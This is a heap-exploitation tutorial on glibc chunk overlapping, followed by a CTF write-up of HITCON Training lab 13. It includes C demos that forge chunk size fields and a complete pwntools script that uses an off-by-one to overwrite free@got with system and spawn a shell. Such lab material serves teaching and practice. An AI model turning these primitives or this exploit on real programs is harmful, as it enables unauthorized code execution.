Chunk Overlapping

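Chunk extend is an easy-to-understand exploitation technique: by modifying a chunk's size or prev_size field we extend the chunk and thereby gain out-of-bounds control over the chunks around it. The precondition is a heap bug that lets us overwrite those header fields.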

Principle

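Chunk navigation in malloc is computed almost entirely from the size field. The size acts like an offset: adding it to or subtracting it from a chunk's address yields the next or previous chunk, and this is how the implicit list of chunks is maintained. Let's look at a few key macros: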

Getting the previous chunk

/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
#define prev_size(p) ((p)->mchunk_prev_size)

/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))

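Subtracting prev_size from the current chunk's address gives the address of the previous chunk (only valid when the current chunk's PREV_INUSE bit is clear).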

Getting the next chunk

/* Get size, ignoring use bits */
#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))

/* Like chunksize, but do not mask SIZE_BITS.  */
#define chunksize_nomask(p)         ((p)->mchunk_size)

/* Ptr to next physical malloc_chunk. */
#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
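
To make the pointer arithmetic concrete, here is a small Python model of the three macros above. It is only a sketch: addresses are plain integers, the 64-bit flag mask 0x7 is assumed, and the sample addresses are taken from the fastbin demo's heap dump further down.

```python
# Hypothetical Python model of the glibc chunk-navigation macros (64-bit).
# Addresses are plain integers; nothing here touches real memory.

SIZE_BITS = 0x7  # PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA


def chunksize(size_field):
    """Like chunksize(): drop the three flag bits from the size field."""
    return size_field & ~SIZE_BITS


def next_chunk(p, size_field):
    """Like next_chunk(): current chunk address plus the masked size."""
    return p + chunksize(size_field)


def prev_chunk(p, prev_size):
    """Like prev_chunk(): current chunk address minus prev_size.
    glibc only trusts this when p's PREV_INUSE bit is clear."""
    return p - prev_size


# Chunk 1 of the fastbin demo: address 0x602000, size field 0x21
print(hex(next_chunk(0x602000, 0x21)))  # 0x602020
print(hex(prev_chunk(0x602020, 0x20)))  # 0x602000
```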

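First, chunksize() masks off the low three bits because they hold three flags (PREV_INUSE, IS_MMAPPED and NON_MAIN_ARENA), so a chunk size is always a multiple of 8. There is one detail here that deserves special attention: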

On 32-bit, chunk addresses are 8-byte aligned; on 64-bit, they are 16-byte aligned.

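We will analyze later why this detail matters so much. Here, adding the size to the current chunk's address gives next_chunk.
So if we can control the size or prev_size field, we can operate across chunk boundaries and make chunks overlap.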
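
The alignment detail matters because of how malloc turns a request into a chunk size. The sketch below is a Python model of glibc's request2size(), assuming the classic MALLOC_ALIGNMENT of 2 * SIZE_SZ and MINSIZE of 4 * SIZE_SZ; usable() is a hypothetical helper name for the number of bytes the caller can actually write.

```python
def request2size(req, size_sz=8):
    """Model of glibc's request2size() under the classic layout.

    size_sz is SIZE_SZ (8 on 64-bit, 4 on 32-bit). Alignment is assumed to
    be 2 * SIZE_SZ, matching the 16/8-byte figures above.
    """
    align_mask = 2 * size_sz - 1
    minsize = 4 * size_sz  # MIN_CHUNK_SIZE, already aligned here
    if req + size_sz + align_mask < minsize:
        return minsize
    return (req + size_sz + align_mask) & ~align_mask


def usable(req, size_sz=8):
    """Bytes the caller may use: the chunk minus its own size field.
    The last SIZE_SZ of these overlap the next chunk's prev_size field."""
    return request2size(req, size_sz) - size_sz


for req in (0x10, 0x18, 0x19):
    print(hex(req), "->", hex(request2size(req)), "usable", hex(usable(req)))
```

On 64-bit, malloc(0x10) and malloc(0x18) both produce a 0x20 chunk, but only a 0x18 request is expected to spill into the 8 bytes that double as the next chunk's prev_size.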

fastbin extend

This approach enlarges the size of one chunk so that it swallows the chunk that follows it. Here is a demo:

All of the following code assumes a 64-bit environment.

#include <stdlib.h>

int main() {
    void *ptr, *ptr1;

    ptr = malloc(0x10); // allocate the first 0x10 chunk
    malloc(0x10);       // allocate the second 0x10 chunk

    *(size_t *)((char *)ptr - 0x8) = 0x41; // overwrite the first chunk's size field

    free(ptr);
    ptr1 = malloc(0x30); // extend achieved: ptr1 now covers the second chunk's contents
    return 0;
}

After the two mallocs, the heap looks like this:

0x602000:   0x0000000000000000  0x0000000000000021 <=== chunk 1
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021 <=== chunk 2
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000020fc1 <=== top chunk

Next we change chunk1's size field to 0x41: 0x40 covers exactly both 0x20 chunks, and the low bit 1 is the PREV_INUSE flag.

Note: the size here includes the chunk header.
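
A quick check of why 0x41 is the right value, using the addresses from the dump above (a Python sketch; the 64-bit flag mask is assumed):

```python
PREV_INUSE = 0x1
SIZE_BITS = 0x7

chunk1 = 0x602000          # from the heap dump above
chunk1_size = 0x20         # malloc(0x10) -> 0x20-byte chunk
chunk2_size = 0x20

# Forged size: both chunks, headers included, plus the PREV_INUSE flag
forged = (chunk1_size + chunk2_size) | PREV_INUSE

# Where malloc now thinks chunk 1 ends
end = chunk1 + (forged & ~SIZE_BITS)

print(hex(forged), hex(end))  # 0x41 0x602040
```

The forged chunk now ends exactly at 0x602040, the start of the top chunk, so chunk 2 lies entirely inside it.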

Next we free chunk1:

0x602000:   0x0000000000000000  0x0000000000000041 <=== tampered size
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000020fc1 

After the free, chunk1 and chunk2 are treated as a single 0x40 chunk and released together:

Fastbins[idx=0, size=0x10] 0x00
Fastbins[idx=1, size=0x20] 0x00
Fastbins[idx=2, size=0x30]  ←  Chunk(addr=0x602010, size=0x40, flags=PREV_INUSE) 
Fastbins[idx=3, size=0x40] 0x00
Fastbins[idx=4, size=0x50] 0x00
Fastbins[idx=5, size=0x60] 0x00
Fastbins[idx=6, size=0x70] 0x00

Then malloc(0x30) returns the combined chunk1+chunk2 block, so we can control chunk2's contents directly. This state is called overlapping chunks.

We request 0x30 because the combined chunk size minus the 0x10-byte chunk header is 0x40 - 0x10 = 0x30.
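
Both the free and the later malloc(0x30) hit the same fastbin. A minimal sketch, assuming glibc's 64-bit fastbin_index() formula ((sz >> 4) - 2) and a simplified 64-bit request2size():

```python
def request2size(req):
    """Simplified 64-bit request2size(): 8-byte size field, 16-byte alignment, 0x20 minimum."""
    return max((req + 8 + 0xf) & ~0xf, 0x20)


def fastbin_index(sz):
    """64-bit fastbin_index(): 0x20 -> 0, 0x30 -> 1, 0x40 -> 2, ..."""
    return (sz >> 4) - 2


freed_idx = fastbin_index(0x41 & ~0x7)           # bin the forged chunk is freed into
wanted_idx = fastbin_index(request2size(0x30))   # bin malloc(0x30) searches
print(freed_idx, wanted_idx)                     # 2 2
```

Index 2 is also the bin in which gef lists the forged chunk above.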

inuse small bin

This is similar to the fastbin case, except that we must make sure the freed small bin chunk does not get merged into the top chunk.

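#include <stdlib.h>

int main() {
    void *ptr, *ptr1;

    ptr = malloc(0x80); // allocate chunk1 (0x80 bytes)
    malloc(0x10);       // allocate chunk2 (0x10 bytes)
    malloc(0x10);       // guard chunk: prevents merging with the top chunk

    // the original (int) cast truncated the 64-bit pointer; use a char * offset instead
    *(size_t *)((char *)ptr - 0x8) = 0xb1; // overwrite chunk1's size field
    free(ptr);
    ptr1 = malloc(0xa0);
    return 0;
}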

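In this example the requested size is outside the fastbin range, so if the freed chunk were adjacent to the top chunk it would be merged into it. We therefore allocate an extra chunk to separate the freed block from the top chunk.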
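
The sizes in this demo can be checked the same way. This sketch (simplified 64-bit request2size(), addresses taken from the dump that follows) shows that with the forged 0xb1 size, the chunk free() looks at next is the guard chunk rather than the top chunk:

```python
SIZE_BITS = 0x7
PREV_INUSE = 0x1


def request2size(req):
    """Simplified 64-bit request2size()."""
    return max((req + 8 + 0xf) & ~0xf, 0x20)


chunk1 = 0x602000
c1 = request2size(0x80)           # chunk1: 0x90
c2 = request2size(0x10)           # chunk2: 0x20
guard = chunk1 + c1 + c2          # guard chunk
top = guard + request2size(0x10)  # top chunk after the guard

forged = (c1 + c2) | PREV_INUSE   # value written over chunk1's size field
next_seen_by_free = chunk1 + (forged & ~SIZE_BITS)

print(hex(forged), hex(next_seen_by_free), hex(guard), hex(top))
```

Without the guard allocation, next_seen_by_free would be the top chunk and the freed block would simply be absorbed into it.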

0x602000:   0x0000000000000000  0x00000000000000b1 <=== chunk1, size field tampered
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000000
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000000  0x0000000000000021 <=== chunk2
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000021 <=== guard chunk (prevents merging)
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000020f31 <=== top chunk

After the free, chunk1 swallows chunk2, and the combined block is placed into the unsorted bin:

0x602000:   0x0000000000000000  0x00000000000000b1 <=== placed in the unsorted bin
0x602010:   0x00007ffff7dd1b78  0x00007ffff7dd1b78
0x602020:   0x0000000000000000  0x0000000000000000
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000000  0x0000000000000021
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x00000000000000b0  0x0000000000000020 <=== note: now marked as free
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000020f31 <=== top chunk
[+] unsorted_bins[0]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0xb0, flags=PREV_INUSE)

On the next allocation we get back the space of both chunk1 and chunk2, and can then control chunk2's contents.
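
The dump above also shows what free() wrote into the guard chunk's header. Here is a rough Python model of those two writes (the footer written by set_foot() and the cleared PREV_INUSE bit, as in glibc's _int_free), plus the size that malloc(0xa0) asks for, under the same simplified 64-bit request2size():

```python
PREV_INUSE = 0x1


def request2size(req):
    """Simplified 64-bit request2size()."""
    return max((req + 8 + 0xf) & ~0xf, 0x20)


merged_size = 0xb0                 # chunk1 + chunk2 as seen by free()
guard_size_field = 0x21            # guard chunk header before free (chunk2 in use)

# When free() files the merged chunk in the unsorted bin, it also updates
# the guard chunk's header:
guard_prev_size = merged_size                            # footer = free chunk size
guard_size_field_after = guard_size_field & ~PREV_INUSE  # previous chunk is now free

print(hex(guard_prev_size), hex(guard_size_field_after))  # 0xb0 0x20
print(request2size(0xa0) == merged_size)                   # True: exact fit
```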

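We can also tamper with the size of a small bin chunk while it is free, but not with that of a free fastbin chunk: malloc looks up the fastbin by the requested size, and when it takes a chunk out it checks that the chunk's size matches that bin.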
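
That check can be sketched as follows. This is a toy model of the size check _int_malloc applies to a chunk it pops from a fastbin (glibc 2.23-era behaviour and the 64-bit fastbin_index() assumed); take_from_fastbin() is a hypothetical name, and the message is the one glibc prints when the check fails.

```python
SIZE_BITS = 0x7


def fastbin_index(sz):
    """64-bit fastbin_index()."""
    return (sz >> 4) - 2


def take_from_fastbin(idx, victim_size_field):
    """Toy model of the check made on a chunk popped from fastbin[idx]."""
    if fastbin_index(victim_size_field & ~SIZE_BITS) != idx:
        raise RuntimeError("malloc(): memory corruption (fast)")
    return victim_size_field & ~SIZE_BITS


# A chunk freed into the 0x20 bin (idx 0) and left untouched passes
print(hex(take_from_fastbin(0, 0x21)))

# The same chunk with its size later tampered to 0x41 is rejected
try:
    take_from_fastbin(0, 0x41)
except RuntimeError as err:
    print("abort:", err)
```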

Backward overlapping (merging with earlier chunks)

Here we merge with earlier chunks by modifying a later chunk's prev_inuse and prev_size fields.

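#include <stdlib.h>

int main(void) {
    void *ptr1, *ptr2, *ptr3, *ptr4;
    ptr1 = malloc(128);  // smallbin1
    ptr2 = malloc(0x10); // fastbin1
    ptr3 = malloc(0x10); // fastbin2
    ptr4 = malloc(128);  // smallbin2
    malloc(0x10);        // prevents merging with the top chunk
    free(ptr1);
    *(size_t *)((char *)ptr4 - 0x8) = 0x90;  // size field with prev_inuse cleared
    *(size_t *)((char *)ptr4 - 0x10) = 0xd0; // forged prev_size
    free(ptr4);          // backward consolidation unlinks ptr1's chunk: backward extend
    malloc(0x150);       // reclaims the merged chunk, which overlaps ptr2 and ptr3
    return 0;
}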

Backward extend abuses the unlink that small bin chunks go through during backward consolidation: by forging prev_size, the merge can span several chunks and produce overlapping.
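
The numbers in this demo can be checked with a short sketch. It assumes a simplified 64-bit request2size(), a hypothetical base address, and a glibc old enough to have neither tcache (so ptr1 really sits in the unsorted bin when ptr4 is freed) nor the 2.29 "corrupted size vs. prev_size while consolidating" check, which this forged prev_size would fail.

```python
PREV_INUSE = 0x1


def request2size(req):
    """Simplified 64-bit request2size()."""
    return max((req + 8 + 0xf) & ~0xf, 0x20)


base = 0x602000  # hypothetical address of ptr1's chunk
s1, s2, s3, s4 = (request2size(n) for n in (128, 0x10, 0x10, 128))
chunk4 = base + s1 + s2 + s3

forged_prev_size = s1 + s2 + s3                       # written at ptr4 - 0x10
forged_size_field = (s4 | PREV_INUSE) & ~PREV_INUSE   # ptr4 - 0x8: 0x91 -> 0x90

prev = chunk4 - forged_prev_size   # what prev_chunk() yields for ptr4's chunk
merged = forged_prev_size + s4     # size after backward consolidation

print(hex(forged_prev_size), hex(forged_size_field), hex(prev), hex(merged))
print(request2size(0x150) == merged)
```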

Now let's look at an example:

HITCON Training lab 13

root@Aurora:/home/code/pwn/Just-pwn/practice/heap/off-by-one/hitcon_training13(master⚡) #checksec heapcreator 
[*] '/home/code/pwn/Just-pwn/practice/heap/off-by-one/hitcon_training13/heapcreator'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE

The program keeps a global array heaparray[10] that holds up to 10 pointers. Its functionality is roughly as follows:

create

Creates a new heap entry from the user's input and then reads its content:

unsigned __int64 create_heap()
{
  _QWORD *v0; // rbx
  signed int i; // [rsp+4h] [rbp-2Ch]
  size_t size; // [rsp+8h] [rbp-28h]
  char buf; // [rsp+10h] [rbp-20h]
  unsigned __int64 v5; // [rsp+18h] [rbp-18h]

  v5 = __readfsqword(0x28u);
  for ( i = 0; i <= 9; ++i )
  {
    if ( !heaparray[i] )
    {
      heaparray[i] = malloc(0x10uLL);   // first allocate a 0x10 header
      if ( !heaparray[i] )
      {
        puts("Allocate Error");
        exit(1);
      }
      printf("Size of Heap : ");
      read(0, &buf, 8uLL);
      size = atoi(&buf);
      v0 = heaparray[i];
      v0[1] = malloc(size); // allocate the user-requested size and store the pointer in heaparray[i][1]
      if ( !*((_QWORD *)heaparray[i] + 1) )
      {
        puts("Allocate Error");
        exit(2);
      }
      *(_QWORD *)heaparray[i] = size;   // store size in heaparray[i][0]
      printf("Content of heap:", &buf);
      read_input(*((void **)heaparray[i] + 1), size); // read the content
      puts("SuccessFul");
      return __readfsqword(0x28u) ^ v5;
    }
  }
  return __readfsqword(0x28u) ^ v5;
}

So each create actually allocates two chunks:

+----------+
+   size   +
+----------+
+   addr   +------->+----------+
+----------+        +  content +
                    +----------+

But since the two mallocs happen back to back, the actual layout is:

+-----------+
+ prev_size +
+-----------+
+  ch_size  +   // the chunk's size field
+-----------+
+   size    +
+-----------+
+   addr    +--------|
+-----------+        |
+ prev_size +        |
+-----------+        |
+  ch_size  +        |
+-----------+<-------|
+  content  +
+   .....   +
.           .
.           .
.           .
+-----------+

So if we can control ch_size, we can write out of bounds.
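
Assuming both mallocs in create() are carved contiguously from the top chunk, the addresses of two consecutive heaps can be predicted. A Python sketch (simplified 64-bit request2size(); create_layout() is a hypothetical helper, and the base 0x603290 is taken from the pwndbg dump later in this section):

```python
def request2size(req):
    """Simplified 64-bit request2size()."""
    return max((req + 8 + 0xf) & ~0xf, 0x20)


def create_layout(base, sizes):
    """Addresses of (header chunk, content chunk) for consecutive create()
    calls, assuming both mallocs are served contiguously from the top chunk."""
    out = []
    cur = base
    for size in sizes:
        header = cur
        cur += request2size(0x10)      # heaparray[i] = malloc(0x10)
        content = cur
        cur += request2size(size)      # heaparray[i][1] = malloc(size)
        out.append((header, content))
    return out


layout = create_layout(0x603290, [0x18, 0x10])
for header, content in layout:
    print(hex(header), hex(content))
```

The content chunk of heap 0 ends exactly where heap 1's header chunk begins, which is what puts heap 1's ch_size within reach.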

edit

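Edits a heap: reads new content for the given index using the size stored earlier. However, the read length is one byte larger than that size, so there is an off-by-one vulnerability.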

unsigned __int64 edit_heap()
{
  int v1; // [rsp+Ch] [rbp-14h]
  char buf; // [rsp+10h] [rbp-10h]
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, &buf, 4uLL);
  v1 = atoi(&buf);
  if ( v1 < 0 || v1 > 9 )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( heaparray[v1] )
  {
    printf("Content of heap : ", &buf);
    read_input(*((void **)heaparray[v1] + 1), *(_QWORD *)heaparray[v1] + 1LL);
    puts("Done !");
  }
  else
  {
    puts("No such heap !");
  }
  return __readfsqword(0x28u) ^ v3;
}

show

Shows a heap: prints the size and content of the heap at the given index.

unsigned __int64 show_heap()
{
  int v1; // [rsp+Ch] [rbp-14h]
  char buf; // [rsp+10h] [rbp-10h]
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, &buf, 4uLL);
  v1 = atoi(&buf);
  if ( v1 < 0 || v1 > 9 )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( heaparray[v1] )
  {
    printf("Size : %ld\nContent : %s\n", *(_QWORD *)heaparray[v1], *((_QWORD *)heaparray[v1] + 1));
    puts("Done !");
  }
  else
  {
    puts("No such heap !");
  }
  return __readfsqword(0x28u) ^ v3;
}

delete

Deletes a heap: frees the given heap (content first, then the header) and sets the corresponding pointer to NULL.

unsigned __int64 delete_heap()
{
  int v1; // [rsp+Ch] [rbp-14h]
  char buf; // [rsp+10h] [rbp-10h]
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, &buf, 4uLL);
  v1 = atoi(&buf);
  if ( v1 < 0 || v1 > 9 )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( heaparray[v1] )
  {
    free(*((void **)heaparray[v1] + 1));
    free(heaparray[v1]);
    heaparray[v1] = 0LL;
    puts("Done !");
  }
  else
  {
    puts("No such heap !");
  }
  return __readfsqword(0x28u) ^ v3;
}

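So the rough plan is: create two heaps (the first with size 0x18), use the off-by-one in edit to change the size of the second heap's header chunk to 0x41, delete and re-create it so that the new content chunk overlaps the new header, point the header's content pointer at free@got, leak free's address to compute system's, overwrite free@got with system, and finally delete a heap whose content is "/bin/sh".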

My script:

#!/usr/bin/env python3
from pwn import *

elf = ELF("./heapcreator")
libc = ELF("./libc.so.6")
context.log_level = "debug"
sh = process("./heapcreator")

free_got = elf.got['free']
log.success("free_got -> " + hex(free_got))
free_libc_addr = libc.symbols['free']
log.success("free_libc_addr -> " + hex(free_libc_addr))
system_libc_addr = libc.symbols['system']
log.success("system_libc_addr -> " + hex(system_libc_addr))

def create(size, content):
    sh.sendline(b'1')
    sh.sendline(str(size).encode())
    sh.sendline(content)
    sh.recvuntil(b"SuccessFul")
    log.success("Create success!")

def edit(index, content):
    sh.sendline(b'2')
    sh.sendline(str(index).encode())
    sh.sendline(content)
    sh.recvuntil(b"Done !")
    log.success("Edit success!")

def show(index):
    sh.sendline(b'3')
    sh.sendline(str(index).encode())

def delete(index):
    sh.sendline(b'4')
    sh.sendline(str(index).encode())
    sh.recvuntil(b"Done !")
    log.success("Delete success!")

if __name__ == "__main__":
    create(0x18, b'aaaa')   # heap 0: a 0x18 content reaches the next chunk's prev_size
    create(0x10, b'bbbb')   # heap 1

    # off-by-one: the 0x19th byte overwrites the low byte of heap 1's header chunk size
    content = b'/bin/sh\x00' + b'a' * 0x10 + b'\x41'
    edit(0, content)
    delete(1)

    # new header reuses the old content chunk, new 0x30 content reuses the 0x40 header chunk,
    # so the content overlaps the header: overwrite its size and content pointer
    content = b'deadbeef' * 4 + p64(30) + p64(free_got)
    create(0x30, content)
    show(1)
    sh.recvuntil(b"Content : ")
    free_addr = u64(sh.recv(6).ljust(8, b'\x00'))
    log.success("free_addr -> " + hex(free_addr))

    offset = free_addr - free_libc_addr
    system_addr = offset + system_libc_addr

    edit(1, p64(system_addr))  # free@got -> system
    delete(0)                  # free("/bin/sh") now calls system("/bin/sh")

    sh.interactive()
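
The leak and rebase steps in the script boil down to a little arithmetic. The sketch below reproduces them with struct instead of pwntools; the free/system offsets and the leaked address are hypothetical values chosen for illustration, not taken from the libc used here, and parse_leak()/rebase() are hypothetical helper names.

```python
import struct


def parse_leak(raw):
    """Same idea as u64(raw.ljust(8, b'\\x00')): %s stops at the first NUL,
    so only the 6 low bytes of a user-space pointer arrive."""
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def rebase(leak, leaked_off, target_off):
    """libc base = leaked address - symbol offset; target = base + offset."""
    base = leak - leaked_off
    assert base & 0xfff == 0, "libc base should be page aligned"
    return base, base + target_off


# Hypothetical values for illustration only (not from a specific libc build)
FREE_OFF, SYSTEM_OFF = 0x844f0, 0x453a0
raw = (0x7ffff7a914f0).to_bytes(8, "little")[:6]   # what recv(6) would return
leak = parse_leak(raw)
base, system = rebase(leak, FREE_OFF, SYSTEM_OFF)
print(hex(leak), hex(base), hex(system))
```

If one of the low bytes of the leaked address happens to be 0x00, %s stops early and fewer than 6 bytes arrive, so the fixed recv(6) would need adjusting.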

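Let's analyze this script. First, it creates a heap of size 0x18. Why that size?
The answer lies in alignment: as mentioned above, on 64-bit chunks are 16-byte aligned, so we need to debug to determine the size of the first chunk. If we request 0x10, the heap looks like this: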

pwndbg> heap
0x603000 PREV_INUSE {
  mchunk_prev_size = 0, 
  mchunk_size = 657, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
0x603290 FASTBIN {
  mchunk_prev_size = 0, 
  mchunk_size = 33, 
  fd = 0x10, 
  bk = 0x6032c0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x21
}
0x6032b0 FASTBIN {           // chunk1
  mchunk_prev_size = 0, 
  mchunk_size = 33, 
  fd = 0x6161616161616161, 
  bk = 0x6262626262626262, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x20d31
}
0x6032d0 PREV_INUSE {        // chunk2
  mchunk_prev_size = 0, 
  mchunk_size = 134449, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
pwndbg> x/20xg 0x603290
0x603290:       0x0000000000000000      0x0000000000000021
0x6032a0:       0x0000000000000010      0x00000000006032c0
0x6032b0:       0x0000000000000000      0x0000000000000021
0x6032c0:       0x6161616161616161      0x6262626262626262
0x6032d0:       0x0000000000000000      0x0000000000020d31
0x6032e0:       0x0000000000000000      0x0000000000000000

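Because of the 16-byte alignment, chunk1 does not use chunk2's prev_size field, so the off-by-one byte cannot reach chunk2's size field. This detail tripped me up for a long time; I only noticed it while reading the glibc source.
If we request 0x18 instead, the heap looks like this: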

0x603290 FASTBIN {
  mchunk_prev_size = 0, 
  mchunk_size = 33, 
  fd = 0x18, 
  bk = 0x6032c0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x21
}
0x6032b0 FASTBIN {
  mchunk_prev_size = 0, 
  mchunk_size = 33, 
  fd = 0x6161616161616161, 
  bk = 0x6262626262626262, 
  fd_nextsize = 0x6363636363636363, 
  bk_nextsize = 0x20d31
}
0x6032d0 PREV_INUSE {
  mchunk_prev_size = 7161677110969590627, 
  mchunk_size = 134449, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
pwndbg> x/20xg 0x603290
0x603290:       0x0000000000000000      0x0000000000000021
0x6032a0:       0x0000000000000018      0x00000000006032c0
0x6032b0:       0x0000000000000000      0x0000000000000021
0x6032c0:       0x6161616161616161      0x6262626262626262
0x6032d0:       0x6363636363636363      0x0000000000020d31
0x6032e0:       0x0000000000000000      0x0000000000000000
0x6032f0:       0x0000000000000000      0x0000000000000000

Now chunk1 does occupy chunk2's prev_size field, which is why this step requires debugging to pick the size.
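
The difference between 0x10 and 0x18 can be computed directly. A small sketch (simplified 64-bit request2size(); off_by_one_target() is a hypothetical helper) that returns which byte of the next chunk's header the extra byte of a size + 1 write lands on:

```python
def request2size(req):
    """Simplified 64-bit request2size()."""
    return max((req + 8 + 0xf) & ~0xf, 0x20)


def off_by_one_target(req):
    """Offset inside the NEXT chunk hit by the extra byte when req + 1 bytes
    are written to malloc(req)'s user pointer (64-bit)."""
    user_start = 0x10               # user data begins after prev_size and size
    last_byte = user_start + req    # index of the (req + 1)-th byte
    return last_byte - request2size(req)


for req in (0x10, 0x18):
    off = off_by_one_target(req)
    field = "prev_size" if off < 8 else "size"
    print(hex(req), "->", off, field)
```

With 0x10 the extra byte only touches the next chunk's prev_size; with 0x18 it lands on the low byte of the next chunk's size field.
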
After chunk1 overwrites chunk2's size via the off-by-one, we allocate again, and the heap looks like this:

```plain
+-----------+
+ prev_size +
+-----------+
+  ch_size  +   // chunk3's size
+-----------+
+  content  +<-------|
+           +        |
+           +        |
+-----------+        |
+ prev_size +        |
+-----------+        |
+  ch_size  +        |
+-----------+        |         free@got
+   addr    +--------|------->+-----------+
+-----------+                 + free_addr +
                              +-----------+
```

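The content here is 0x30 bytes, so it reaches the addr field. We point addr at free@got, leak free's address through show to compute the libc offset, overwrite free@got with system, and finally delete heap 0 (whose content begins with "/bin/sh"), which calls system("/bin/sh") and gives us a shell.
A neat detail: delete(1) puts the 0x20 content chunk and the (now 0x40) header chunk into different size-class bins, and a bin hands out its most recently freed chunk first, so the new header from malloc(0x10) reuses the old content chunk while malloc(0x30) reuses the old header chunk. The addr chunk therefore ends up inside the new content, below its start. At this point the exploit is essentially complete.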
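
The reuse order can be checked with a toy model. ToyBins is a hypothetical per-size LIFO free list standing in for fastbin/tcache behaviour (no real allocator checks), and the heap 1 addresses assume the layout of create(0x18) followed by create(0x10) starting at 0x603290:

```python
from collections import defaultdict


def request2size(req):
    """Simplified 64-bit request2size()."""
    return max((req + 8 + 0xf) & ~0xf, 0x20)


class ToyBins:
    """Per-size LIFO free lists: a stand-in for fastbins/tcache, nothing more."""

    def __init__(self):
        self.lists = defaultdict(list)

    def free(self, chunk, size):
        self.lists[size].append(chunk)

    def malloc(self, req):
        size = request2size(req)
        return self.lists[size].pop() if self.lists[size] else None


bins = ToyBins()
header1, content1 = 0x6032d0, 0x6032f0   # heap 1 chunk addresses (assumed layout)

# delete(1): content first, then the header whose size is now forged to 0x40
bins.free(content1, 0x20)
bins.free(header1, 0x40)

# create(0x30): header = malloc(0x10), content = malloc(0x30)
new_header = bins.malloc(0x10)
new_content = bins.malloc(0x30)
gap = (new_header + 0x10) - (new_content + 0x10)  # user pointer distance
print(hex(new_header), hex(new_content), hex(gap))
```

The 0x20-byte gap is exactly len(b'deadbeef' * 4), so p64(30) and p64(free_got) land on the header's size and addr fields.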